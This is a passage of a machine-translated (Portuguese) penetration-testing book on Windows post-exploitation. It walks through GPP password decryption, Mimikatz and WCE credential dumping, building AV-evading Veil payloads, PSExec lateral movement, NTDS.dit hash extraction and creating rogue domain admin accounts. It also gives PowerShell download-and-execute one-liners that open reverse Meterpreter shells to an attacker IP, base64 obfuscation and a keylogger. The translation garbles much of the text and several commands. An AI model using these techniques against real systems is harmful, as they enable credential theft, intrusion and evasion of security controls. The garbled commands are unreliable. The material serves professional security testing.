cpassword + = "=" * ((4 ­ len (sys.argv [1])% 4)% 4)
password = b64decode (cpassword) # adicionar preenchimento para a seqüência de base64 e decodificá­lo
o = AES.new (key, AES.MODE_CBC) .decrypt (password) # descriptografar a senha
imprima o. [: ­ ord (o [­1])] decodificar ( 'UTF16') # imprimi­lo 910
Fora da caixa este código python funciona muito bem em Backtrack 5, apesar de eu ter tido problemas de executá­lo em
Kali. Depois de executar o script python e alimentá­lo a sua senha criptografada, o script irá decifrá­lo para
o seu homólogo texto claro. Não importa quanto tempo ou complexa a senha é como nós temos a chave para
decifrá­lo. O exemplo acima seria parecido com o seguinte:
root @ bt: ~ / Desktop # ./Gpprefdecrypt.py "AzVJmXh /
J9KrU5n0czX1uBPLSUjzFE8j7dOltPD8tLk "
testpassword
Não importa quão complexa a senha é, os resultados são instantâneos. Todo este processo pode também ser
utilizado quer através PowerShell (consulte a secção PowerShell abaixo para mais detalhes), utilizando o
Segue script: https://raw.github.com/mattifestation/PowerSploit/master/Exfiltration/Get­
GPPPassword.ps1.
Para tornar ainda mais poderoso, ele agora pode ser feito usando o módulo de exploração POST
no Metasploit, também:
usar pós / windows / coletar / credenciais / GPP
Embora eu não tenha visto todas as empresas usam GPP para empurrar contas aos seus hospedeiros finais, ainda a é
prática comum. Se você não receber o acesso a quaisquer contas de domínio, esta é uma das primeiras coisas que você
devem ser verificadas.
Agora você deve ter uma conta administrativa local, que irá, eventualmente, dar­lhe acesso a todos os hosts
na rede. O próximo passo lógico seria usar algo como PSExec para começar a atacar toda a
outros hosts na rede como demonstrado na seção PSExec.
Há momentos, você pode estar em um host e você não quer gastar o tempo quebrando a sua senha
ou colocar um logger chave para captar a sua senha. Duas ferramentas que devem estar em seu bolso de volta ao
Todos os horários são de credenciais do Windows Editor (WCE) e Mimikatz. Ambas essas ferramentas vai tentar recuperar o
texto claro senha armazenada na memória. Por favor note que essas duas ferramentas precisará elevada
17/02/2016 C: \ Users \ Johan \ Desktop \ Johan \ Hacker \ Minha pasta \ The_Hacker_Playbook.pdf
file:///C:/Program%20Files%20(x86)/Free%20PDF%20Solutions/The_Hacker_Playbook/index.html 53/115
privilégios.
WCE ­ Windows Credencial do Editor (http://www.ampliasecurity.com/research/wcefaq.html) (Windows)
Todos nós já utilizado Metasploit e passá­the­hash, mas as senhas são o que somos realmente depois ... WCE é o
responda.
"Credenciais do Windows Editor (WCE) é uma ferramenta de segurança que permite listar sessões e de logon do Windows
adicionar, alterar a lista e excluir credenciais associadas (por exemplo: LM / hashes NT, bilhetes Kerberos e texto claro
senhas). " 11
Na época deste livro, você pode baixar a última binário WCE de
http://www.ampliasecurity.com/research/wce_v1_41beta_universal.zip, mas que deve ter já
agarrou­lo durante a configuração acima de sua seção em caixa.
Por que é WCE tão poderoso? No exemplo abaixo, os dois comandos que eu uso são WCE ­w ­l e WCE. o
opção ­l é a lista de sessões de logon e credenciais NTLM (os hashes) e a opção ­w é para despejar o
senhas em texto puro armazenados pelo pacote de autenticação Digest. Isto significa que se você tiver
credenciais administrativas, você pode pegar a senha desse usuário na memória e você não terá que
passar algum tempo rachaduras hashes. Esta é uma grande economia de tempo ... Deixe­me mostrar­lhe como ele funciona.
Figura 65 ­ Windows Credencial Editor (WCE)
Na seção especial sobre equipes Fugindo AV, eu vou falar sobre como obter o seu executável WCE para
evitar a detecção de AV.
Mimikatz (http://blog.gentilkiwi.com/mimikatz) (Windows)
Mimikatz é outra ferramenta semelhante ao WCE que recupera senhas em texto purofora do LSASS. Eu sou frequentemente
perguntou qual ferramenta é melhor, mas eu sempre aconselhar as pessoas a não conseguir ferramenta específica. Você sempre vai entrar em
um ambiente onde uma ferramenta ou técnica não vai funcionar ou AV captador vontade em uma ferramenta, mas não o
de outros. Nesses casos, torna­se realmente importante para se certificar de que você sempre tem um backup ou
outra forma indireta de obter suas façanhas para trabalhar.
Nas seções seguintes, eu vou mostrar­lhe como executar Mimikatz na memória de modo que você não tem que
soltar qualquer executável no final de acolhimento, mas para este exemplo básico Vou mostrar­lhe o poder de Mimikatz
através do binário executável no host.
Executando o executável no host vítima vai deixá­lo em um shell Mimikatz­like. Os comandos para
puxe senhas em texto puro a partir LSASS são:
privilégio :: debug
sekurlsa :: logonPasswords completos
Figura 66 ­ Mimikatz
Mais uma vez, não importa quanto tempo a sua senha é e você não tem que mesmo se preocupar com o
hashes. Agora você pode ter estes nomes de usuário / senhas e tentar fazer login em todas as outras caixas ou mesmo
o controlador de domínio se for uma conta privilegiada.
Eu queria desenvolver uma seção para basta postar dicas de exploração. Vamos dizer que você chegar em uma caixa de Linux ou em um
17/02/2016 C: \ Users \ Johan \ Desktop \ Johan \ Hacker \ Minha pasta \ The_Hacker_Playbook.pdf
file:///C:/Program%20Files%20(x86)/Free%20PDF%20Solutions/The_Hacker_Playbook/index.html 54/115
host Windows, quais são algumas das coisas que você deseja procurar? Comecei a compilar uma lista de coisas
você deve procurar, mas então eu corri para uma lista muito abrangente de Rob Fuller (Mubix) e
room362.com. 12
Pós Exploração Lista de Room362.com:
Linux / Unix / BSD Pós Exploração: http://bit.ly/pqJxA5
Windows Post Exploitation: http://bit.ly/1em7gvG
OSX Pós Exploração: http://bit.ly/1kVTIMf
Do Sistema obscura Pós Exploração: http://bit.ly/1eR3cbz
Metasploit Pós Exploração: http://bit.ly/JpJ1TR
Estas são listas muito abrangente sobre as coisas que você deve procurar uma vez que você comprometido um sistema.
Incluem­se os comandos para agarrar a configuração do sistema, as informações do usuário, e até mesmo cobrindo o seu
faixas. Eu não posso enfatizar o quanto é importante para entender as coisas para procurar depois que você
comprometer um sistema. Isto é onde a maioria dos script kiddies falhar e onde a penetração profissional
testadores continuamente mover­se através da rede.
Esperemos que com o capítulo anterior você foi capaz de obter acesso a uma conta administrativa local que
funciona em máquinas de todos os utilizadores ou talvez até mesmo uma conta de administrador de domínio. Quais são alguns dos próximos passos
você pode fazer agora com as suas credenciais recém­descobertas? Esta seção é dedicada a possuir continuamente
a rede.
PSExec é uma das minhas ferramentas favoritas que lhe permitirá executar programas e código usando remotamente
credenciais. O que torna esta ferramenta tão impressionante é que PSExec assumirão uma nome de usuário / senha ou
nome de usuário / senha hash.
Vou cobrir toda a exemplo de comprometer sistemas quando estiver na rede. Esse é o mesmo
processo que eu uso para explorar sistemas e dar a volta AV.
Antes de começar, é preciso precisa criar a nossa carga útil. Porque eu quero ter certeza de que eu não
desencadear quaisquer sistemas AV, eu criar um usando payload Veil ofuscado. Você pode ler mais sobre o véu no
a secção Evading AV.
PSExec e Veil (Kali Linux)
Antes que eu possa começar a empurrar um executável para todos os usuários na rede, eu preciso criar uma carga útil
que irá fugir AV e ainda me dá a funcionalidade completa de Meterpreter. Para conseguir isso, eu serei
usando véu para criar a minha carga útil.
Vá para a sua pasta / véu / opt e executar o script python:
cd / opt / Veil
./Veil.py
Neste exemplo, vamos usar o payload MeterHTTPSContained, digitando:
usar 20
17/02/2016 C: \ Users \ Johan \ Desktop \ Johan \ Hacker \ Minha pasta \ The_Hacker_Playbook.pdf
file:///C:/Program%20Files%20(x86)/Free%20PDF%20Solutions/The_Hacker_Playbook/index.html 55/115
Figura 67 ­ Tela Veil Start Up
Tal como acontece com Metasploit, vamos definir o LHOST e LPORT. Para este exemplo, o meu sistema de atacante é
192.168.75.131 e LPORT será 443 (para olhar como SSL).
definir LHOST 192.168.75.131
definir LPORT 443
Depois vamos definir ambas as configurações, é preciso gerar a carga útil, digitando:
gerar
Figura 68 ­ Configurando Veil
Também vamos usar o pyinstaller padrão:
Figura 69 ­ Veil e do Poder de Python
Depois de concluído, o executável será localizado no / / / pasta / root véu­out­put compilado.
Agora que temos uma carga útil que irá fugir AV, vamos configurar Metasploit. Uma vez que começamos a
msfconsole, bem usar o módulo PSExec. As configurações são padrão na definição da exploração,
carga, LHOST, LPORT (estes dois necessita de ser a mesma que a carga gerada com véu),
SMBUser, SMBPassword, SMBDomain, e RHOST. A única opção que é diferente é que nós queremos
para usar a carga criamos com véu usando o EXE set: Configuração personalizada. Aqui estão todos os
comandos que eu uso no exemplo a seguir:
msfconsol
utilização explorar / windows / SMB / psexec
janelas set PAYLOAD / Meterpreter / reverse_https
17/02/2016 C: \ Users \ Johan \ Desktop \ Johan \ Hacker \ Minha pasta \ The_Hacker_Playbook.pdf
file:///C:/Program%20Files%20(x86)/Free%20PDF%20Solutions/The_Hacker_Playbook/index.html 56/115
definir LHOST [IP da minha caixa]
definir LPORT 443
definir SMBUser TestAccount
definir smbpass MyPassword
definir SMBDomain fakeDomain
definir EXE :: Personalizado / root / véu­output / compilou / updater12.exe
definir RHOST [IP do host remoto]
explorar
Figura 70 ­ Usando o Payload Veil dentro PSExec
Uma vez que digitar explorar, PSExec irá logar no sistema vítima e executar a nossa carga personalizado.
Figura 71 ­ reverso HTTPS Handler
Uma vez que temos uma sessão bem sucedida Meterpreter, vamos interagir com a sessão com o comando:
sessões ­i [número da sessão]
Lembra que eu falei sobre a execução de Mimikatz na memória na última seção? Vamos ver isso é
açao.
Se você tiver um sistema que é um sistema de 64 bits, você tem que primeiro migrar para um processo de 64 bits. o
razão de eu querer utilizar um processo de 64 bits é porque essa é a única maneira Mimikatz vai ser capaz de olhar
para as senhas em texto claro em sistemas de 64 bits. Se é um sistema de 32 bits, você ainda pode migrar mas não é
requeridos.
Para listar todos os processos, vamos usar o comando "ps" e migrar vamos usar o comando
"Migrar [pid]". No exemplo abaixo, identificamos o bloco de notas em execução como um processo de 64 bits e
migraram para ele.
ps
migram [pid de um processo x86_64]
Você pode precisar para se tornar "sistema" antes de fazer qualquer um desses comandos. Você pode fazer isso através da emissão de
o seguinte comando:
getsystem
Se você se negado e é um administrador local, consulte a seção UAC manual.
17/02/2016 C: \ Users \ Johan \ Desktop \ Johan \ Hacker \ Minha pasta \ The_Hacker_Playbook.pdf
file:///C:/Program%20Files%20(x86)/Free%20PDF%20Solutions/The_Hacker_Playbook/index.html 57/115
Uma vez que migraram e funcionando como um sistema, queremos carregar Mimikatz e escreva os kerberos comando (ouvocê pode usar wdigest). Isso deve nos dar as senhas em texto claro da atual usuários logados.
kerberos
wdigest
Figura 72 ­ Mimikatz
Temos agora uma outra conta e senha para utilizar. Há sempre outros módulos de pós em
módulos Metasploit que você pode querer olhar para além Mimikatz. Eles são Incognito
(Http://www.offensive­security.com/metasploit­unleashed/Fun_With_Incognito) e Inteligente_
HashDump (http://www.darkoperator.com/blog/2011/5/19/metasploit­post­module­smart_hashdump.html), mas este deve obter ­lhe o suficiente acesso on este acolhimento para o tempo ­estar.
Psexec Comandos em Múltiplas IPs (Kali Linux)
Uma vez que temos credenciais que tenham acesso administrativo local, há momentos em que eu não quero
comprometer cada host, mas apenas executar comandos naquelas máquinas. Por exemplo, alguns comandos que você pode
deseja executar em todos os hosts são:
net group "Administradores de domínio" / domínio (lista de todos os Administradores de domínio em servidores)
qwinsta (lista sobre informações de sessão do usuário)
Criar Contas Administrativas adicionais em todos os hosts
o net user username password / ADD / DOMAIN
o grupo net "Administradores de domínio" username / ADD / DOMAIN
o net localgroup administradores username / ADD
Royce Davis tinha tomado o código psexec original e modificado para não enviar nenhum binários, mas
alcançar a execução remota de código de linha de comando na memória. Isto é assim que você evitar a detecção AV e
Outro benefício módulo é a capacidade de executar comandos de rosca em vários sistemas. Eu vou lhe mostrar uma
exemplo rápido:
usar auxiliar / admin / SMB / psexec_command
definir rhosts [IP ou Intervalo IP]
definir SMBDomain [Informação de Domínio]
definir smbpass [Senha]
definir SMBUser [usuário]
conjunto de comandos [comando que pretende executar na linha de comando]
explorar
17/02/2016 C: \ Users \ Johan \ Desktop \ Johan \ Hacker \ Minha pasta \ The_Hacker_Playbook.pdf
file:///C:/Program%20Files%20(x86)/Free%20PDF%20Solutions/The_Hacker_Playbook/index.html 58/115
Figura 73 ­ qwinsta
Se você se lembrar no início durante a criação de seu fase de caixa, você tinha a opção de ativar
log para Metasploit. Esta é uma área que, sempre que o registo pode ser muito útil. Se você deseja executar
código em / 24 rede ou maior, a saída vai ser bastante extensa. Se você precisa analisar através
­lo, é muito mais fácil ter log Metasploit o tráfego e grep esse arquivo. 13 No comando anterior, eu
foi capaz de executar o comando qwinsta em cada host e ligá IPs com nomes de usuários. Se eu tenho uma lista de TI
administradores, I pode ir diretamente atacar sua caixa, em vez de comprometer todos os hosts na rede.
Se tiver sorte o suficiente para obter uma conta administrativa local ou uma conta de administrador de domínio, o próximo
­alvo é geralmente o controlador de domínio (DC). Um dos momentos mais felizes para qualquer pentester é quando
eles puxam com êxito todos os hashes fora da DC.
Mesmo com credenciais administrativas, não temos acesso para ler os hashes no Doman
Controlador que estão armazenados no arquivo C: \ Windows \ NTDS \ ntds.dit. Isso ocorre porque esse arquivo é leitura
trancada como Active Directory constantemente acessa­lo. A solução para este problema está usando a Sombra
Funcionalidade de cópia nativamente no Windows para criar uma cópia do arquivo. 14
SMBExec (https://github.com/brav0hax/smbexec) (Kali Linux)
Este é o lugar onde uma ferramenta chamada SMBExec entra em jogo. SMBExec, uma ferramenta feita por brav0hax 15 , faz exatamente
isso para pegar as chaves SYS Reg e ntds. arquivo dit utilizando a funcionalidade de cópia de sombra. Vamos dar uma olhada
no módulo de SMBExec que nós instalado na criação de sua seção em caixa.
correndo SMBExec
o cd / opt / smbexec
o ./smbexec
Selecione 3 para Obter Hashes
Selecione 2 para controladores de domínio
Fornecer nome de usuário / haxixe / domínio / IP / NTDS Drive / Path NTDS
Figura 74 ­ SMBExec
O que acabamos de ver é que SMBExec conectado ao controlador de domínio com credenciais válidas,
17/02/2016 C: \ Users \ Johan \ Desktop \ Johan \ Hacker \ Minha pasta \ The_Hacker_Playbook.pdf
file:///C:/Program%20Files%20(x86)/Free%20PDF%20Solutions/The_Hacker_Playbook/index.html 59/115
caminhos validados, e tentou criar uma cópia de sombra da ntds.dit e arquivos sys. Uma vez que esta foiconcluída, SMBExec tentou analisar através desses arquivos e recolher e armazenar todos os hashes de senha
de LDAP.
Uma vez SMBExec termina e é bem sucedido, ele cria uma pasta no mesmo diretório com base em uma data­
carimbo de tempo. Se você vá para esta pasta, você verá um arquivo chamado [domain] ­DC­hashes.lst.
Figura 75 ­ Resultados SMBExec
Dentro do exemplo comprometida Domain Controller eu sou capaz de encontrar os hashes NTLM para o
seguintes usuários:
Administrador: 500: aad3b435b51404eeaad3b435b51404ee: 8b9e471f8 3d355eda6bf63524b044870 :::
Guest: 501: aad3b435b51404eeaad3b435b51404ee: 31d6cfe0d16ae931 b73c59d7e0c089c0 :::
admin_account: 1000: aad3b435b51404eeaad3b435b51404ee: 954bf28f 34e47904f5c8725650f27283 ::
krbtgt: 502: aad3b435b51404eeaad3b435b51404ee: 876c4efd01dbf8da 6cd04c60ddac0f95 :::
bobsmith: 1105: aad3b435b51404eeaad3b435b51404ee: 8faf590241a5d 5ed59fb80eb00440589 :::
domainadmin: 1106: aad3b435b51404eeaad3b435b51404ee: 8faf59024 1a5d5ed59fb80eb00440589 :::
pmartian: 1107: aad3b435b51404eeaad3b435b51404ee: 8faf590241a5d 5ed59fb80eb00440589 :::
Lembre­se que se você estiver consultando um controlador de domínio grande ir tomar um café, como isso vai levar um
quantidade de tempo considerável. Depois de coletar todos estes hashes, você pode começar a quebra de senha ou
utilizar a passagem de hashes para explorar continuamente caixas.
(Https://github.com/mattifestation/PowerSploit) (Windows)
A razão pela qual eu dediquei um par de seções para PowerShell é porque este é onde eu acredito que o futuro
de ataques estão indo. Há um monte de gente grande em nossa indústria a desenvolver ferramentas e técnicas para
usar o PowerShell e WMI para aproveitar as ferramentas nativas do Windows.
Quero demonstrar uma das minhas favoritas maneiras de mover­se lateralmente dentro de uma organização, uma vez que você tem
credenciais com PowerShell. PowerSploit é um quadro PowerShell de módulos por Matt Graeber.
Você pode ler muito mais sobre ele em sua página no Github: https://github.com/mattifestation/PowerSploit.
Por que usar o PowerShell para pós exploração que você pode perguntar? PowerShell é usado ativamente pela penetração
testadores, pois utiliza ferramentas nativas do Windows, você pode ter tudo correr na memória ignorando assim
detecção AV, você pode injetar DLLs nos processos, e pode usar atual em cache do Windows da vítima
credenciais para acessar o domínio.
Para descrever conceitualmente como vamos usar o PowerShell, assumir que temos válida locais
credenciais administrativas e estão em algum lugar na rede do alvo. Vamos usar o PowerShell para
forçar um usuário a baixar e chamar um script PowerShell eo objetivo é ganhar um reverso Meterpreter
Concha.
O script queremos que o nosso host de destino para baixar e executar é chamado Invoke­Shellcode. Isso vai
contêm todo o código que é necessário para executar no cliente para criar um Meterpreter reverter HTTPS
Concha. Você pode ler mais sobre este script ea funcionalidade completa dentro do Invoke­Shellcode.ps1
(Https://raw.github.com/mattifestation/PowerSploit/master/CodeExecution/Invoke­Shellcode.ps1). UMA
pequeno trecho do arquivo Invoke­Shellcode.ps1 está abaixo descrevendo injetar shellcode em
PowerShell e reverter HTTPS Meterpreter cargas úteis.
C: \ PS> Invoke­Shellcode
Descrição
­­­­­­­­­­­­­­
Injectar shellcode para a instância em execução do PowerShell.
17/02/2016 C: \ Users \ Johan \ Desktop \ Johan \ Hacker \ Minha pasta \ The_Hacker_Playbook.pdf
file:///C:/Program%20Files%20(x86)/Free%20PDF%20Solutions/The_Hacker_Playbook/index.html 60/115
C: \ PS> Iniciar­Process C: \ Windows \ SysWOW64 \ notepad.exe ­WindowStyle Invisível
C: \ PS> $ Proc = Get­Process bloco de notas
C: \ PS> Chamar­Shellcode ­ProcessId $ Proc.Id ­Payload janelas / metro­Preter / reverse_https ­Lhost
192.168.30.129 ­Lport 443 ­Verbose
Detalhado: Requestingmeterpreterpayloadfromhttps: //192.168.30.129: 443/ INITM
VERBOSE: Injetando shellcode em PID: 4004
VERBOSE: Injetar em um processo Wow64.
VERBOSE: Usando shellcode de 32 bits.
VERBOSE: Memória Shellcode reservados no 0x03BE0000
VERBOSE: Emissor de 32 bits chamada de montagem topo.
VERBOSE: Linha de memória chamada de stub reservados no 0x001B0000
VERBOSE: injeção Shellcode completa!
Vamos começar! Primeiro, vamos cair na nossa pasta com todos os nossos scripts do Shell de energia. Como eu disse anteriormente,
estamos tentando fazer com que nossas vítimas para gerar um shell reverso Meterpreter, então vamos ter que começar a
manipulador em nosso sistema de ataque de acolhimento reversa. Graças a obsecure­sec, ele criou um pequeno script Python
chamado StartListener.py, que irá configurar este ouvinte para nós eo que é ainda mais fácil é que já
baixado arquivo durante a fase de instalação. 16 Podemos usar os seguintes comandos em nosso Kali Linux
caixa para obter o nosso ouvinte em funcionamento:
cd / opt / PowerScript /
python ./StartListner.py [host IP] 443
Se você der uma olhada no script StartListener.py, ele não só irá iniciar o ouvinte, mas inclui o
AutoRunScripts a Smart­migrar o processo uma vez que uma série vítima liga de volta para nós. Uma vez que você tenha
o sucesso ouvinte em execução, deve olhar como na imagem abaixo.
Figura 76 ­ StartListener.py
Agora que temos uma escuta manipulador de sucesso, vamos cair executar alguns scripts do PowerShell. No
anfitrião da vítima, precisamos carregar o arquivo Invoke­Shellcode.ps1 na memória e, em seguida, executar o reverso
executável Meterpreter.
comandos:
Desde PowerShell é executado somente no Windows, os seguintes comandos estarão utilizando nosso do Windows
Atacando VM. No exemplo mais básico, os seguintes PowerShell comando baixa Invoke­
Shellcode.ps1 e, em seguida, executa um shell HTTPS inversa Meterpreter na memória no host que o
script é executado em:
IEX (New­Object Net.WebClient) .DownloadString ( 'https: //raw.github.
com / mattifestation / PowerSploit / master / CodeExecution / Invoke­Shellcode.ps1 '); Invocar­Shellcode ­
janelas de carga útil / meterpreter / reverse_https ­Lhost 192.168.10.10 ­Lport 443 ­Force
Vamos quebra exatamente o que está acontecendo aqui. Este comando IEX instrui PowerShell para download
o Invoke­Shellcode.ps1 a partir da web, execute esse script, e, por último invocar o reverso Meterpreter
função shell para chamar de volta para minha caixa de atacante no 192.168.10.10 na porta 443.
17/02/2016 C: \ Users \ Johan \ Desktop \ Johan \ Hacker \ Minha pasta \ The_Hacker_Playbook.pdf
file:///C:/Program%20Files%20(x86)/Free%20PDF%20Solutions/The_Hacker_Playbook/index.html 61/115
Uma outra coisa que eu gostaria de fazer para o meu comando PowerShell é base64 codificá­los para se certificar de que eu
não terá quaisquer problemas com caracteres especiais e para ofuscar minhas faixas. Você pode obter um script python
para converter qualquer comandos PowerShell em Base64 aqui, que também foi baixado durante a configuração
Estágio:
https://raw.github.com/darkoperator/powershell_scripts/master/ps_encoder.py
Vamos dar o nosso comando e base64 codificá­lo. A entrada para encoder.py ps_ é um arquivo de texto, então vamos echo
nosso carregador PowerShell em um arquivo de texto:
cd / opt / PowerSploit /
echo "IEX (New­Object Net.WebClient) .DownloadString ( 'https://raw.gi
thub.com/mattifestation/PowerSploit/master/CodeExecution/Invoke­Shellcode.ps1 '); Invoke­
janelas Shellcode ­Payload / Meterpreter / reverse_https ­Lhost 192.168.10.10 ­Lport 443 ­Force ">
raw.txt
Para codificar o arquivo para Base64, vamos usar o comando:
./ps_encoder.py ­s raw.txt
Sua saída deve ser de código base64 e guardar isso fora. No meu exemplo, aqui está parte da minha saída:
SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUA­
dAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAG­
wAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAcwA6A­
C8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAC4
Agora que temos nossos base64 carga codificado, precisamos executar remotamente presente em nosso remoto
sistema da vítima do nosso host atacante do Windows. Lembre­se como na fase de configuração que eu disse que você tinha
precisa tanto um host atacante Windows e acolhimento atacante Linux. Esta é a principal razão para ter tanto
sistemas e pronto para usar.
Para se conectar remotamente a outro sistemas Windows, vamos usar o Invoke­WmiMethod
comando que é nativa do PowerShell em nosso host. Isto pode ser executado com:
Invocar­WmiMethod ­Class Win32_Process ­Name criar ­ArgumentList "powershell.exe ­enc
[String Base64 codificado] "­ComputerName [vítima IP] ­Credential [usuário]
Isto diz PowerShell para se conectar a um servidor remoto e executar a seqüência de base64 codificado em um específico
porta. Após a execução deste comando no host Windows atacante, um prompt com uma
caixa de autenticação / Senha Nome de usuário irá aparecer e você vai digitar as credenciais do controle remoto
hospedar ou uma conta administrativa local. Se a autenticação for bem sucedida, você verá uma mensagem como
que aparecem aqui.
Figura 77 ­ conectar remotamente aos anfitriões e executar Payload
Uma vez que o script é baixado e executado no host vítima, devemos voltar para o sistema onde
temos o ouvinte em execução (onde executamos StartListner.py em nosso anfitrião Kali Linux). Deveríamos
ver agora o anfitrião da vítima ligar de volta para o nosso servidor e sessões Meterpreter será agora criado.
Figura 78 ­ reverso HTTPS Session
17/02/2016 C: \ Users \ Johan \ Desktop \ Johan \ Hacker \ Minha pasta \ The_Hacker_Playbook.pdf
file:///C:/Program%20Files%20(x86)/Free%20PDF%20Solutions/The_Hacker_Playbook/index.html 62/115
O que acontece na nossa caixa de atacante com a escuta manipulador Meterpreter é que temos o stager e
sessão aberta. Em seguida, os AutoRunScripts vai migrar o processo para que a nossa sessão não fica
mortos e agora temos uma concha cheia Meterpreter no host vítima. 1718
Se você assistir a todo o processo acontece no host vítima, você vai perceber que o comando inicial é
executado usando o comando powershell.exe. O anfitrião, então, baixar o script para a memória e
executar o shell de memória. Isto significa que nenhum arquivo são descartados no host vítima e AV
muito provavelmente não irá disparar em todas as assinaturas. Ainda melhor é o facto de que, se o sistema hospedeiro fornece qualquer
tipo de proteção de lista branca, eles provavelmente irão ter powershell.exe aprovado, pois é um padrão
funcionalidade do Windows.
Uma vez em um host, você pode facilmente carregar outros scripts do PowerShell. Dê uma olhada
https://github.com/mattifestation/PowerSploit/tree/master para ver todos os outros módulos que são
disponível. Estes vão desde ferramentas de persistência, desvio AV, Exfiltração, Recon e muito mais. Vamos levar
mais um dos exemplos de Github do mattifestation. PowerSploit vem com um keylogger que é
localizado aqui: https://raw.github.com/mattifestation/PowerSploit/master/Exfiltration/Get­
Keystrokes.ps1. Nós estão indo para carregar isso em um sistema que tem acesso a e permitir que ele. Lembre­se de que
o keylogger irá executar totalmente na memória, mas vai escrever a saída para um arquivo no host vítima.
Primeiro cair em PowerShell e execute o seguinte comando:
powershell.exe
IEX (New­Object Net.WebClient) .DownloadString ( 'https: // cru.
github.com/mattifestation/PowerSploit/master/Exfiltration/Get­Keystrokes.ps1 ')
Isto irá baixar e executar o script na memória. Em seguida, para ativar a funcionalidade keylogger,
você pode fazer isso com os seguintes comandos:
Get­Teclar ­logPath C: \ key.log ­CollectionInterval 1
Sua saída será localizado em C: \ key.log. Você também pode fazer esses comandos remotamente usando a
mesmos comandos e passos que tinha feito para o script PowerShell Meterpreter.
Outros scripts PowerSploit que eugosto de usar durante um compromisso:
Exfiltração / Out­Minidump.ps1 (memória despejo de um processo)
Exfiltração / Get­TimedScreenshot.ps1 (tirar uma captura de tela do computador das vítimas)
Eu sou um grande fã do trabalho esses caras têm posto em fazer PowerShell mais poderosa para pentesters.
Como desta escrita atual, eu não vi nenhum AV ou assinaturas desencadear ao implantar o meu laterais
ataques usando PowerShell.
(Https://code.google.com/p/nishang/) (Windows)
Outro membro ativo da comunidade PowerShell é Nikhil Mittal. Você pode encontrar o seu trabalho em
https://code.google.com/p/nishang/and em o tempo de este escrito é atualmente a versão 3.0.
A maioria de seus scripts do Shell de energia são dedicados a postar exploração e coleta de informações. Vamos
vejam o que tipos de scripts de ele se desenvolveu. O mais fácil de script Shell de energia para começar com
é chamado Get­Information.ps1. Vamos tentar executar o script Shell Poder nativamente usando o comando:
shell poder ­FILE Get­Information.ps1
Figura 79 ­ Get­Information.ps1
Na imagem acima, vemos que a execução falhou devido a políticas incapacitantes de scripts não confiáveis.
Uma coisa que discutimos é que, se eles têm deficientes execução Power Shell, você pode ignorar a política
com a seguinte opção:
Poder shell ExecutionPolicy Bypass ­FILE Get­Information.ps1
Que praticamente faz qualquer protecção contra Power Shell falhar. Não só é Power Shell em todos os
7 sistemas e maior por padrão, mas é extremamente difícil parar estes scripts do Windows. Olhando dentro
17/02/2016 C: \ Users \ Johan \ Desktop \ Johan \ Hacker \ Minha pasta \ The_Hacker_Playbook.pdf
file:///C:/Program%20Files%20(x86)/Free%20PDF%20Solutions/The_Hacker_Playbook/index.html 63/115
os detalhes do roteiro Get­Informação, podemos ver o que de saída que vai apresentar. Olhe para a
seguinte código:
Figura 80 ­ Lista das informações recolhidas
O script vai puxar informações do ambiente Shell Energia, informações Putty, usado recentemente
comandos, ações, variáveis ​​de ambiente, informação SNMP, aplicativos instalados, informações de domínio,
informações do usuário, informações do sistema e informações sem fio. Aqui está um exemplo de saída com êxito
executar o script Shell de energia:
Figura 81 ­ Sistema de Informação
Uma boa parte da informação que você pode usar depois pós exploração é referenciado aqui. Além
a este roteiro abrangente, outro exemplo útil é o Get­WLAN­Keys.ps1. Executando o. \ Get­
WLAN­Keys.ps1, acabamos puxando para baixo todas as informações Wi­Fi dos usuários e as configurações armazenadas,
que inclui o SSID e senha.
Figura 82 ­ Wireless Key
Do meu exemplo acima, podemos ver o nome SSID e a senha, que é armazenado no
Key_Content. 19 Podemos agora conectar a sua rede sem fio, se eles estão usando uma chave estática
processo de autenticação (não WPA­Enterprise) sem ter que quebrar qualquer hashes.
Se você quiser ver mais funcionalidade com as ferramentas de Nishang, visite seu website em
http://www.labofapenetrationtester.com/2013/09/powerpreter­and­nishang­Part­2.html. Como nós temos
visto, Power Shell é extremamente poderoso e à medida que mais pesquisadores se mudar para o campo PowerShell,
vamos ver mais e mais funcional para testadores de penetração.
17/02/2016 C: \ Users \ Johan \ Desktop \ Johan \ Hacker \ Minha pasta \ The_Hacker_Playbook.pdf
file:///C:/Program%20Files%20(x86)/Free%20PDF%20Solutions/The_Hacker_Playbook/index.html 64/115
Eu não entendo como muitos testes, que exigem o envenenamento ARP mais, mas ainda há momentos em que eu uso
envenenamento como um último recurso. Desde o envenenamento ARP não é um novo ataque, eu não vou entrar em profundidade sobre exatamente
por envenenamento ARP funciona ou como preveni­la. Vou apenas rapidamente a pé através como configurar tipo ARP
ataques e como eu gosto melhor para utilizá­los em meus compromissos.
Quando estamos a falar sobre a realização de ataques ARP spoofing / envenenamento, normalmente eu vou contar com duas ferramentas.
As duas ferramentas que eu encontrei para ser muito útil são Caim e Abel e Ettercap .
Caim e Abel (Windows)
Download: http://www.oxid.it/cain.html
Sistema operacional: Windows
Se você quiser ver por falsificação ARP funciona, você pode ler mais sobre ele de
http://www.irongeek.com/i.php?page=security/arpspoof. Vamos ver como nós pode ARP falsificar a nossa vítima
usando Cain e Abel . Para sucesso ARP spoof em Cain , clique no botão sniffer no canto superior esquerdo,
clique na guia sniffer, e selecione a digitalização MAC Endereço botão.
Figura 83 ­ Caim e Abel Scanning endereços MAC
Em seguida, cair na guia ARP na parte inferior do Cain , selecione ARP na coluna da esquerda e clique no botão "Plus"
assinar no topo bar (uma coisa a notar é que o botão + pode não ser visível. Tente clicar no
painel do meio para fazer esse botão ativado).
17/02/2016 C: \ Users \ Johan \ Desktop \ Johan \ Hacker \ Minha pasta \ The_Hacker_Playbook.pdf
file:///C:/Program%20Files%20(x86)/Free%20PDF%20Solutions/The_Hacker_Playbook/index.html 65/115
Figura 84 ­ Lista abril
Isso deve abrir a IPs da verificação anterior e que você precisa fazer é selecionar o host para
ARP Spoof e o gateway IP.
Figura 85 ­ ABRIL veneno Routing
Por último, você precisa clicar sobre a abril Intoxicação start / botão localizado na barra de menu superior parar e você
está tudo pronto.
Figura 86 ­ O envenenamento de sucesso
Agora que temos uma full MITM ARP Poisoning , podemos ir procurar senhas em texto puro. Você pode fazer
isso indo até a guia Senhas na parte inferior da tela e selecionar HTTP ou qualquer outra clara
protocolo de texto.
Figura 87 ­ HTTP Limpar Text
